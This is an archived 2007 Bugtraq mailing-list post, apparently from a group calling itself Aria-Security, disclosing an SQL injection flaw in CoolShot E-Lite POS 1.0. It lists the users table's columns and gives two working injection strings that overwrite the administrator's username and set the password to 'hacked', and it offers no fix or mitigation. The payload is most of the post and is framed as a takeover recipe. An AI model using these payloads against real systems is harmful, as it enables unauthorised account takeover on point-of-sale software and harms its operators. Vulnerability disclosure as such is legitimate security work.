| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071124082738.9057.qmail@securityfocus.com> Date: 24 Nov 2007 08:27:38 -0000 From: no-reply@...a-Security.net To: bugtraq@...urityfocus.com Subject: Aria-Security.net: CoolShot E-Lite POS 1.0 Aria-Security Team http://aria-security.net ------------------------------------- CoolShot E-Lite POS 1.0 http://coolshot.net/index.php/works/49-e-lite-pos Original Advisory @ http://aria-security.net/forum/showthread.php?p=1108#post1108 Published on November 24 2007 users.user_id users.user_name users.user_email users.user_admin users.user_auth users.user_pw use these two queries -1' UPDATE users set user_name= 'admin' Where(user_iD= '1');-- -1' UPDATE users set user_pw= 'hacked' Where(user_iD= '1');-- there you go with the user admin and password hacked. Credits Goes to Aria-Security Team A SPECIAL THANKS TO: AurA Regards, The-0utl4w
Powered by blists - more mailing lists